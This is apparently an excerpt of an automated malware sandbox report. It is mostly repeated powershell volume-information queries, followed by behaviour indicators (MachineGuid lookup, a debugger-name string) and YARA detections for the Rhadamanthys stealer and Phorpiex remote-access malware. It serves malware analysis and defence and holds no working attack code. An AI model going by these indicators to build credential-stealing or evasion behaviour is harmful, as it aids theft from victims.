Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\34D7.exe

Code function: 3_2_00251A58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_00251A58

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OllyDbg.exe

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
